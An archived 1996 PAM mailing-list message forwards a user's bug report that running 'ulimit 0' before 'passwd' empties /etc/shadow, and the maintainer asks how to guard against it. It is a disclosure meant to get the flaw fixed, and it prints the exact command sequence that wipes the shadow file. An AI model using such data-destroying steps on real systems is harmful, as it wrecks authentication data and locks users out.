[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

passwd module attack...



This isn't too hard to deal with in the passwd module; does someone
want to deal with this before .53 is released?

Also, should the framework protect against attacks like this and
thereby make it easier to write modules?

michaelkjohnson

------- Forwarded Message

From: Cedric Maion <cmaion@I209-b.resI.insa-lyon.fr>
To: "'johnsonm@redhat.com'" <johnsonm@redhat.com>
Subject: Denial of service attack with passwd !
Date: Sun, 6 Oct 1996 02:54:45 +0100

Hello

I'm using PAM and shadow-utils on my Linux box. Great. That's pretty =
cool, but....
It's sounds terrible, but everybody could easily zeros my /etc/shadow =
file... !!!!

All you need is to type :

$ ulimit 0
$ passwd
Password:
New passsword:
New password (again):
Password changed
passwd: all authentification tokens updated successfully

Then :
$ ls -al /etc/shadow
- -r--------   1 root            0 Oct   6 02:37 shadow

Argh !  :-(

I send this to you, because I do not really know where I should post =
this, but I think it may be linked with PAM (or at least with passwd).

Could you contact the right person ?


Thanks in advance !

       Cedric Maion


- --
Cedric Maion

WWW :
   http://Aurora.resI.insa-lyon.fr/

Email : =20
   cmaion@Aurora.resI.insa-lyon.fr
   cmaion@ifhamy.insa-lyon.fr
   -- PGP public key available --

------- End of Forwarded Message





[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index] []